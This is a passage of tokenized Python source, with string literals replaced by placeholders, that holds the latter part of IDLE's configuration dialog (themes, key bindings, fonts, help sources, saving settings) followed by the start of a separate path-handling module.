get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , value ) <EOL> if value : <EOL> self . VarChanged_builtinKeys ( ) <EOL> else : <EOL> self . VarChanged_customKeys ( ) <EOL> def VarChanged_winWidth ( self , * params ) : <EOL> value = self . winWidth . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:width>' , value ) <EOL> def VarChanged_winHeight ( self , * params ) : <EOL> value = self . winHeight . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_paraWidth ( self , * params ) : <EOL> value = self . paraWidth . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_startupEdit ( self , * params ) : <EOL> value = self . startupEdit . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_autoSave ( self , * params ) : <EOL> value = self . autoSave . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def VarChanged_encoding ( self , * params ) : <EOL> value = self . encoding . get ( ) <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , value ) <EOL> def ResetChangedItems ( self ) : <EOL> self . changedItems = { '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> def AddChangedItem ( self , type , section , item , value ) : <EOL> value = str ( value ) <EOL> if not self . changedItems [ type ] . has_key ( section ) : <EOL> self . changedItems [ type ] [ section ] = { } <EOL> self . changedItems [ type ] [ section ] [ item ] = value <EOL> def GetDefaultItems ( self ) : <EOL> dItems = { '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> for configType in dItems . keys ( ) : <EOL> sections = idleConf . 
GetSectionList ( '<STR_LIT:default>' , configType ) <EOL> for section in sections : <EOL> dItems [ configType ] [ section ] = { } <EOL> options = idleConf . defaultCfg [ configType ] . GetOptionList ( section ) <EOL> for option in options : <EOL> dItems [ configType ] [ section ] [ option ] = ( <EOL> idleConf . defaultCfg [ configType ] . Get ( section , option ) ) <EOL> return dItems <EOL> def SetThemeType ( self ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> self . optMenuThemeBuiltin . config ( state = NORMAL ) <EOL> self . optMenuThemeCustom . config ( state = DISABLED ) <EOL> self . buttonDeleteCustomTheme . config ( state = DISABLED ) <EOL> else : <EOL> self . optMenuThemeBuiltin . config ( state = DISABLED ) <EOL> self . radioThemeCustom . config ( state = NORMAL ) <EOL> self . optMenuThemeCustom . config ( state = NORMAL ) <EOL> self . buttonDeleteCustomTheme . config ( state = NORMAL ) <EOL> def SetKeysType ( self ) : <EOL> if self . keysAreBuiltin . get ( ) : <EOL> self . optMenuKeysBuiltin . config ( state = NORMAL ) <EOL> self . optMenuKeysCustom . config ( state = DISABLED ) <EOL> self . buttonDeleteCustomKeys . config ( state = DISABLED ) <EOL> else : <EOL> self . optMenuKeysBuiltin . config ( state = DISABLED ) <EOL> self . radioKeysCustom . config ( state = NORMAL ) <EOL> self . optMenuKeysCustom . config ( state = NORMAL ) <EOL> self . buttonDeleteCustomKeys . config ( state = NORMAL ) <EOL> def GetNewKeys ( self ) : <EOL> listIndex = self . listBindings . index ( ANCHOR ) <EOL> binding = self . listBindings . get ( listIndex ) <EOL> bindName = binding . split ( ) [ <NUM_LIT:0> ] <EOL> if self . keysAreBuiltin . get ( ) : <EOL> currentKeySetName = self . builtinKeys . get ( ) <EOL> else : <EOL> currentKeySetName = self . customKeys . get ( ) <EOL> currentBindings = idleConf . GetCurrentKeySet ( ) <EOL> if currentKeySetName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> keySetChanges = self . 
changedItems [ '<STR_LIT>' ] [ currentKeySetName ] <EOL> for event in keySetChanges . keys ( ) : <EOL> currentBindings [ event ] = keySetChanges [ event ] . split ( ) <EOL> currentKeySequences = currentBindings . values ( ) <EOL> newKeys = GetKeysDialog ( self , '<STR_LIT>' , bindName , <EOL> currentKeySequences ) . result <EOL> if newKeys : <EOL> if self . keysAreBuiltin . get ( ) : <EOL> message = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> newKeySet = self . GetNewKeysName ( message ) <EOL> if not newKeySet : <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> return <EOL> else : <EOL> self . CreateNewKeySet ( newKeySet ) <EOL> self . listBindings . delete ( listIndex ) <EOL> self . listBindings . insert ( listIndex , bindName + '<STR_LIT>' + newKeys ) <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> self . keyBinding . set ( newKeys ) <EOL> else : <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> def GetNewKeysName ( self , message ) : <EOL> usedNames = ( idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) + <EOL> idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) ) <EOL> newKeySet = GetCfgSectionNameDialog ( self , '<STR_LIT>' , <EOL> message , usedNames ) . result <EOL> return newKeySet <EOL> def SaveAsNewKeySet ( self ) : <EOL> newKeysName = self . GetNewKeysName ( '<STR_LIT>' ) <EOL> if newKeysName : <EOL> self . CreateNewKeySet ( newKeysName ) <EOL> def KeyBindingSelected ( self , event ) : <EOL> self . buttonNewKeys . config ( state = NORMAL ) <EOL> def CreateNewKeySet ( self , newKeySetName ) : <EOL> if self . keysAreBuiltin . get ( ) : <EOL> prevKeySetName = self . builtinKeys . get ( ) <EOL> else : <EOL> prevKeySetName = self . customKeys . get ( ) <EOL> prevKeys = idleConf . 
GetCoreKeys ( prevKeySetName ) <EOL> newKeys = { } <EOL> for event in prevKeys . keys ( ) : <EOL> eventName = event [ <NUM_LIT:2> : - <NUM_LIT:2> ] <EOL> binding = string . join ( prevKeys [ event ] ) <EOL> newKeys [ eventName ] = binding <EOL> if prevKeySetName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> keySetChanges = self . changedItems [ '<STR_LIT>' ] [ prevKeySetName ] <EOL> for event in keySetChanges . keys ( ) : <EOL> newKeys [ event ] = keySetChanges [ event ] <EOL> self . SaveNewKeySet ( newKeySetName , newKeys ) <EOL> customKeyList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> customKeyList . sort ( ) <EOL> self . optMenuKeysCustom . SetMenu ( customKeyList , newKeySetName ) <EOL> self . keysAreBuiltin . set ( <NUM_LIT:0> ) <EOL> self . SetKeysType ( ) <EOL> def LoadKeysList ( self , keySetName ) : <EOL> reselect = <NUM_LIT:0> <EOL> newKeySet = <NUM_LIT:0> <EOL> if self . listBindings . curselection ( ) : <EOL> reselect = <NUM_LIT:1> <EOL> listIndex = self . listBindings . index ( ANCHOR ) <EOL> keySet = idleConf . GetKeySet ( keySetName ) <EOL> bindNames = keySet . keys ( ) <EOL> bindNames . sort ( ) <EOL> self . listBindings . delete ( <NUM_LIT:0> , END ) <EOL> for bindName in bindNames : <EOL> key = string . join ( keySet [ bindName ] ) <EOL> bindName = bindName [ <NUM_LIT:2> : - <NUM_LIT:2> ] <EOL> if keySetName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> if bindName in self . changedItems [ '<STR_LIT>' ] [ keySetName ] . keys ( ) : <EOL> key = self . changedItems [ '<STR_LIT>' ] [ keySetName ] [ bindName ] <EOL> self . listBindings . insert ( END , bindName + '<STR_LIT>' + key ) <EOL> if reselect : <EOL> self . listBindings . see ( listIndex ) <EOL> self . listBindings . select_set ( listIndex ) <EOL> self . listBindings . select_anchor ( listIndex ) <EOL> def DeleteCustomKeys ( self ) : <EOL> keySetName = self . customKeys . get ( ) <EOL> if not tkMessageBox . 
askyesno ( '<STR_LIT>' , '<STR_LIT>' + <EOL> '<STR_LIT>' % ( keySetName ) , <EOL> parent = self ) : <EOL> return <EOL> idleConf . userCfg [ '<STR_LIT>' ] . remove_section ( keySetName ) <EOL> if self . changedItems [ '<STR_LIT>' ] . has_key ( keySetName ) : <EOL> del ( self . changedItems [ '<STR_LIT>' ] [ keySetName ] ) <EOL> idleConf . userCfg [ '<STR_LIT>' ] . Save ( ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioKeysCustom . config ( state = DISABLED ) <EOL> self . optMenuKeysCustom . SetMenu ( itemList , '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuKeysCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . keysAreBuiltin . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:default>' ) ) <EOL> self . builtinKeys . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> self . Apply ( ) <EOL> self . SetKeysType ( ) <EOL> def DeleteCustomTheme ( self ) : <EOL> themeName = self . customTheme . get ( ) <EOL> if not tkMessageBox . askyesno ( '<STR_LIT>' , '<STR_LIT>' + <EOL> '<STR_LIT>' % ( themeName , ) , <EOL> parent = self ) : <EOL> return <EOL> idleConf . userCfg [ '<STR_LIT>' ] . remove_section ( themeName ) <EOL> if self . changedItems [ '<STR_LIT>' ] . has_key ( themeName ) : <EOL> del ( self . changedItems [ '<STR_LIT>' ] [ themeName ] ) <EOL> idleConf . userCfg [ '<STR_LIT>' ] . Save ( ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioThemeCustom . config ( state = DISABLED ) <EOL> self . optMenuThemeCustom . SetMenu ( itemList , '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuThemeCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . themeIsBuiltin . set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:default>' ) ) <EOL> self . builtinTheme . 
set ( idleConf . defaultCfg [ '<STR_LIT>' ] . Get ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> self . Apply ( ) <EOL> self . SetThemeType ( ) <EOL> def GetColour ( self ) : <EOL> target = self . highlightTarget . get ( ) <EOL> prevColour = self . frameColourSet . cget ( '<STR_LIT>' ) <EOL> rgbTuplet , colourString = tkColorChooser . askcolor ( parent = self , <EOL> title = '<STR_LIT>' + target , initialcolor = prevColour ) <EOL> if colourString and ( colourString != prevColour ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> message = ( '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> newTheme = self . GetNewThemeName ( message ) <EOL> if not newTheme : <EOL> return <EOL> else : <EOL> self . CreateNewTheme ( newTheme ) <EOL> self . colour . set ( colourString ) <EOL> else : <EOL> self . colour . set ( colourString ) <EOL> def OnNewColourSet ( self ) : <EOL> newColour = self . colour . get ( ) <EOL> self . frameColourSet . config ( bg = newColour ) <EOL> if self . fgHilite . get ( ) : plane = '<STR_LIT>' <EOL> else : plane = '<STR_LIT>' <EOL> sampleElement = self . themeElements [ self . highlightTarget . get ( ) ] [ <NUM_LIT:0> ] <EOL> self . textHighlightSample . tag_config ( sampleElement , ** { plane : newColour } ) <EOL> theme = self . customTheme . get ( ) <EOL> themeElement = sampleElement + '<STR_LIT:->' + plane <EOL> self . AddChangedItem ( '<STR_LIT>' , theme , themeElement , newColour ) <EOL> def GetNewThemeName ( self , message ) : <EOL> usedNames = ( idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) + <EOL> idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) ) <EOL> newTheme = GetCfgSectionNameDialog ( self , '<STR_LIT>' , <EOL> message , usedNames ) . result <EOL> return newTheme <EOL> def SaveAsNewTheme ( self ) : <EOL> newThemeName = self . GetNewThemeName ( '<STR_LIT>' ) <EOL> if newThemeName : <EOL> self . CreateNewTheme ( newThemeName ) <EOL> def CreateNewTheme ( self , newThemeName ) : <EOL> if self . themeIsBuiltin . 
get ( ) : <EOL> themeType = '<STR_LIT:default>' <EOL> themeName = self . builtinTheme . get ( ) <EOL> else : <EOL> themeType = '<STR_LIT:user>' <EOL> themeName = self . customTheme . get ( ) <EOL> newTheme = idleConf . GetThemeDict ( themeType , themeName ) <EOL> if themeName in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> themeChanges = self . changedItems [ '<STR_LIT>' ] [ themeName ] <EOL> for element in themeChanges . keys ( ) : <EOL> newTheme [ element ] = themeChanges [ element ] <EOL> self . SaveNewTheme ( newThemeName , newTheme ) <EOL> customThemeList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> customThemeList . sort ( ) <EOL> self . optMenuThemeCustom . SetMenu ( customThemeList , newThemeName ) <EOL> self . themeIsBuiltin . set ( <NUM_LIT:0> ) <EOL> self . SetThemeType ( ) <EOL> def OnListFontButtonRelease ( self , event ) : <EOL> font = self . listFontName . get ( ANCHOR ) <EOL> self . fontName . set ( font . lower ( ) ) <EOL> self . SetFontSample ( ) <EOL> def SetFontSample ( self , event = None ) : <EOL> fontName = self . fontName . get ( ) <EOL> if self . fontBold . get ( ) : <EOL> fontWeight = tkFont . BOLD <EOL> else : <EOL> fontWeight = tkFont . NORMAL <EOL> self . editFont . config ( size = self . fontSize . get ( ) , <EOL> weight = fontWeight , family = fontName ) <EOL> def SetHighlightTarget ( self ) : <EOL> if self . highlightTarget . get ( ) == '<STR_LIT>' : <EOL> self . radioFg . config ( state = DISABLED ) <EOL> self . radioBg . config ( state = DISABLED ) <EOL> self . fgHilite . set ( <NUM_LIT:1> ) <EOL> else : <EOL> self . radioFg . config ( state = NORMAL ) <EOL> self . radioBg . config ( state = NORMAL ) <EOL> self . fgHilite . set ( <NUM_LIT:1> ) <EOL> self . SetColourSample ( ) <EOL> def SetColourSampleBinding ( self , * args ) : <EOL> self . SetColourSample ( ) <EOL> def SetColourSample ( self ) : <EOL> tag = self . themeElements [ self . highlightTarget . get ( ) ] [ <NUM_LIT:0> ] <EOL> if self . 
fgHilite . get ( ) : plane = '<STR_LIT>' <EOL> else : plane = '<STR_LIT>' <EOL> colour = self . textHighlightSample . tag_cget ( tag , plane ) <EOL> self . frameColourSet . config ( bg = colour ) <EOL> def PaintThemeSample ( self ) : <EOL> if self . themeIsBuiltin . get ( ) : <EOL> theme = self . builtinTheme . get ( ) <EOL> else : <EOL> theme = self . customTheme . get ( ) <EOL> for elementTitle in self . themeElements . keys ( ) : <EOL> element = self . themeElements [ elementTitle ] [ <NUM_LIT:0> ] <EOL> colours = idleConf . GetHighlight ( theme , element ) <EOL> if element == '<STR_LIT>' : <EOL> colours [ '<STR_LIT>' ] = idleConf . GetHighlight ( theme , <EOL> '<STR_LIT>' , fgBg = '<STR_LIT>' ) <EOL> if theme in self . changedItems [ '<STR_LIT>' ] . keys ( ) : <EOL> themeDict = self . changedItems [ '<STR_LIT>' ] [ theme ] <EOL> if themeDict . has_key ( element + '<STR_LIT>' ) : <EOL> colours [ '<STR_LIT>' ] = themeDict [ element + '<STR_LIT>' ] <EOL> if themeDict . has_key ( element + '<STR_LIT>' ) : <EOL> colours [ '<STR_LIT>' ] = themeDict [ element + '<STR_LIT>' ] <EOL> self . textHighlightSample . tag_config ( element , ** colours ) <EOL> self . SetColourSample ( ) <EOL> def HelpSourceSelected ( self , event ) : <EOL> self . SetHelpListButtonStates ( ) <EOL> def SetHelpListButtonStates ( self ) : <EOL> if self . listHelp . size ( ) < <NUM_LIT:1> : <EOL> self . buttonHelpListEdit . config ( state = DISABLED ) <EOL> self . buttonHelpListRemove . config ( state = DISABLED ) <EOL> else : <EOL> if self . listHelp . curselection ( ) : <EOL> self . buttonHelpListEdit . config ( state = NORMAL ) <EOL> self . buttonHelpListRemove . config ( state = NORMAL ) <EOL> else : <EOL> self . buttonHelpListEdit . config ( state = DISABLED ) <EOL> self . buttonHelpListRemove . config ( state = DISABLED ) <EOL> def HelpListItemAdd ( self ) : <EOL> helpSource = GetHelpSourceDialog ( self , '<STR_LIT>' ) . result <EOL> if helpSource : <EOL> self . userHelpList . 
append ( ( helpSource [ <NUM_LIT:0> ] , helpSource [ <NUM_LIT:1> ] ) ) <EOL> self . listHelp . insert ( END , helpSource [ <NUM_LIT:0> ] ) <EOL> self . UpdateUserHelpChangedItems ( ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def HelpListItemEdit ( self ) : <EOL> itemIndex = self . listHelp . index ( ANCHOR ) <EOL> helpSource = self . userHelpList [ itemIndex ] <EOL> newHelpSource = GetHelpSourceDialog ( self , '<STR_LIT>' , <EOL> menuItem = helpSource [ <NUM_LIT:0> ] , filePath = helpSource [ <NUM_LIT:1> ] ) . result <EOL> if ( not newHelpSource ) or ( newHelpSource == helpSource ) : <EOL> return <EOL> self . userHelpList [ itemIndex ] = newHelpSource <EOL> self . listHelp . delete ( itemIndex ) <EOL> self . listHelp . insert ( itemIndex , newHelpSource [ <NUM_LIT:0> ] ) <EOL> self . UpdateUserHelpChangedItems ( ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def HelpListItemRemove ( self ) : <EOL> itemIndex = self . listHelp . index ( ANCHOR ) <EOL> del ( self . userHelpList [ itemIndex ] ) <EOL> self . listHelp . delete ( itemIndex ) <EOL> self . UpdateUserHelpChangedItems ( ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def UpdateUserHelpChangedItems ( self ) : <EOL> "<STR_LIT>" <EOL> self . changedItems [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { } <EOL> for num in range ( <NUM_LIT:1> , len ( self . userHelpList ) + <NUM_LIT:1> ) : <EOL> self . AddChangedItem ( '<STR_LIT>' , '<STR_LIT>' , str ( num ) , <EOL> string . join ( self . userHelpList [ num - <NUM_LIT:1> ] [ : <NUM_LIT:2> ] , '<STR_LIT:;>' ) ) <EOL> def LoadFontCfg ( self ) : <EOL> fonts = list ( tkFont . families ( self ) ) <EOL> fonts . sort ( ) <EOL> for font in fonts : <EOL> self . listFontName . insert ( END , font ) <EOL> configuredFont = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = '<STR_LIT>' ) <EOL> lc_configuredFont = configuredFont . lower ( ) <EOL> self . fontName . set ( lc_configuredFont ) <EOL> lc_fonts = [ s . 
lower ( ) for s in fonts ] <EOL> if lc_configuredFont in lc_fonts : <EOL> currentFontIndex = lc_fonts . index ( lc_configuredFont ) <EOL> self . listFontName . see ( currentFontIndex ) <EOL> self . listFontName . select_set ( currentFontIndex ) <EOL> self . listFontName . select_anchor ( currentFontIndex ) <EOL> fontSize = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = '<STR_LIT>' ) <EOL> self . optMenuFontSize . SetMenu ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , fontSize ) <EOL> self . fontBold . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = <NUM_LIT:0> , type = '<STR_LIT:bool>' ) ) <EOL> self . SetFontSample ( ) <EOL> def LoadTabCfg ( self ) : <EOL> spaceNum = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = <NUM_LIT:4> , type = '<STR_LIT:int>' ) <EOL> self . spaceNum . set ( spaceNum ) <EOL> def LoadThemeCfg ( self ) : <EOL> self . themeIsBuiltin . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , <EOL> type = '<STR_LIT:bool>' , default = <NUM_LIT:1> ) ) <EOL> currentOption = idleConf . CurrentTheme ( ) <EOL> if self . themeIsBuiltin . get ( ) : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuThemeBuiltin . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioThemeCustom . config ( state = DISABLED ) <EOL> self . customTheme . set ( '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuThemeCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> else : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuThemeCustom . 
SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuThemeBuiltin . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . SetThemeType ( ) <EOL> themeNames = self . themeElements . keys ( ) <EOL> themeNames . sort ( self . __ThemeNameIndexCompare ) <EOL> self . optMenuHighlightTarget . SetMenu ( themeNames , themeNames [ <NUM_LIT:0> ] ) <EOL> self . PaintThemeSample ( ) <EOL> self . SetHighlightTarget ( ) <EOL> def __ThemeNameIndexCompare ( self , a , b ) : <EOL> if self . themeElements [ a ] [ <NUM_LIT:1> ] < self . themeElements [ b ] [ <NUM_LIT:1> ] : return - <NUM_LIT:1> <EOL> elif self . themeElements [ a ] [ <NUM_LIT:1> ] == self . themeElements [ b ] [ <NUM_LIT:1> ] : return <NUM_LIT:0> <EOL> else : return <NUM_LIT:1> <EOL> def LoadKeyCfg ( self ) : <EOL> self . keysAreBuiltin . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:default>' , <EOL> type = '<STR_LIT:bool>' , default = <NUM_LIT:1> ) ) <EOL> currentOption = idleConf . CurrentKeys ( ) <EOL> if self . keysAreBuiltin . get ( ) : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuKeysBuiltin . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> if not itemList : <EOL> self . radioKeysCustom . config ( state = DISABLED ) <EOL> self . customKeys . set ( '<STR_LIT>' ) <EOL> else : <EOL> self . optMenuKeysCustom . SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> else : <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuKeysCustom . SetMenu ( itemList , currentOption ) <EOL> itemList = idleConf . GetSectionList ( '<STR_LIT:default>' , '<STR_LIT>' ) <EOL> itemList . sort ( ) <EOL> self . optMenuKeysBuiltin . 
SetMenu ( itemList , itemList [ <NUM_LIT:0> ] ) <EOL> self . SetKeysType ( ) <EOL> keySetName = idleConf . CurrentKeys ( ) <EOL> self . LoadKeysList ( keySetName ) <EOL> def LoadGeneralCfg ( self ) : <EOL> self . startupEdit . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = <NUM_LIT:1> , type = '<STR_LIT:bool>' ) ) <EOL> self . autoSave . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> default = <NUM_LIT:0> , type = '<STR_LIT:bool>' ) ) <EOL> self . winWidth . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:width>' ) ) <EOL> self . winHeight . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . paraWidth . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . encoding . set ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , default = '<STR_LIT:none>' ) ) <EOL> self . userHelpList = idleConf . GetAllExtraHelpSourcesList ( ) <EOL> for helpItem in self . userHelpList : <EOL> self . listHelp . insert ( END , helpItem [ <NUM_LIT:0> ] ) <EOL> self . SetHelpListButtonStates ( ) <EOL> def LoadConfigs ( self ) : <EOL> """<STR_LIT>""" <EOL> self . LoadFontCfg ( ) <EOL> self . LoadTabCfg ( ) <EOL> self . LoadThemeCfg ( ) <EOL> self . LoadKeyCfg ( ) <EOL> self . LoadGeneralCfg ( ) <EOL> def SaveNewKeySet ( self , keySetName , keySet ) : <EOL> """<STR_LIT>""" <EOL> if not idleConf . userCfg [ '<STR_LIT>' ] . has_section ( keySetName ) : <EOL> idleConf . userCfg [ '<STR_LIT>' ] . add_section ( keySetName ) <EOL> for event in keySet . keys ( ) : <EOL> value = keySet [ event ] <EOL> idleConf . userCfg [ '<STR_LIT>' ] . SetOption ( keySetName , event , value ) <EOL> def SaveNewTheme ( self , themeName , theme ) : <EOL> """<STR_LIT>""" <EOL> if not idleConf . userCfg [ '<STR_LIT>' ] . has_section ( themeName ) : <EOL> idleConf . userCfg [ '<STR_LIT>' ] . add_section ( themeName ) <EOL> for element in theme . 
keys ( ) : <EOL> value = theme [ element ] <EOL> idleConf . userCfg [ '<STR_LIT>' ] . SetOption ( themeName , element , value ) <EOL> def SetUserValue ( self , configType , section , item , value ) : <EOL> if idleConf . defaultCfg [ configType ] . has_option ( section , item ) : <EOL> if idleConf . defaultCfg [ configType ] . Get ( section , item ) == value : <EOL> return idleConf . userCfg [ configType ] . RemoveOption ( section , item ) <EOL> return idleConf . userCfg [ configType ] . SetOption ( section , item , value ) <EOL> def SaveAllChangedConfigs ( self ) : <EOL> "<STR_LIT>" <EOL> idleConf . userCfg [ '<STR_LIT>' ] . Save ( ) <EOL> for configType in self . changedItems . keys ( ) : <EOL> cfgTypeHasChanges = False <EOL> for section in self . changedItems [ configType ] . keys ( ) : <EOL> if section == '<STR_LIT>' : <EOL> idleConf . userCfg [ '<STR_LIT>' ] . remove_section ( '<STR_LIT>' ) <EOL> cfgTypeHasChanges = True <EOL> for item in self . changedItems [ configType ] [ section ] . keys ( ) : <EOL> value = self . changedItems [ configType ] [ section ] [ item ] <EOL> if self . SetUserValue ( configType , section , item , value ) : <EOL> cfgTypeHasChanges = True <EOL> if cfgTypeHasChanges : <EOL> idleConf . userCfg [ configType ] . Save ( ) <EOL> for configType in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> idleConf . userCfg [ configType ] . Save ( ) <EOL> self . ResetChangedItems ( ) <EOL> def DeactivateCurrentConfig ( self ) : <EOL> winInstances = self . parent . instance_dict . keys ( ) <EOL> for instance in winInstances : <EOL> instance . RemoveKeybindings ( ) <EOL> def ActivateConfigChanges ( self ) : <EOL> "<STR_LIT>" <EOL> winInstances = self . parent . instance_dict . keys ( ) <EOL> for instance in winInstances : <EOL> instance . ResetColorizer ( ) <EOL> instance . ResetFont ( ) <EOL> instance . set_notabs_indentwidth ( ) <EOL> instance . ApplyKeybindings ( ) <EOL> instance . reset_help_menu_entries ( ) <EOL> def Cancel ( self ) : <EOL> self . 
destroy ( ) <EOL> def Ok ( self ) : <EOL> self . Apply ( ) <EOL> self . destroy ( ) <EOL> def Apply ( self ) : <EOL> self . DeactivateCurrentConfig ( ) <EOL> self . SaveAllChangedConfigs ( ) <EOL> self . ActivateConfigChanges ( ) <EOL> def Help ( self ) : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> root = Tk ( ) <EOL> Button ( root , text = '<STR_LIT>' , <EOL> command = lambda : ConfigDialog ( root , '<STR_LIT>' ) ) . pack ( ) <EOL> root . instance_dict = { } <EOL> root . mainloop ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import stat <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> curdir = '<STR_LIT:.>' <EOL> pardir = '<STR_LIT:..>' <EOL> extsep = '<STR_LIT:.>' <EOL> sep = '<STR_LIT:/>' <EOL> altsep = '<STR_LIT:\\>' <EOL> pathsep = '<STR_LIT:;>' <EOL> defpath = '<STR_LIT>' <EOL> devnull = '<STR_LIT>' <EOL> def normcase ( s ) : <EOL> """<STR_LIT>""" <EOL> return s . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) . lower ( ) <EOL> def isabs ( s ) : <EOL> """<STR_LIT>""" <EOL> s = 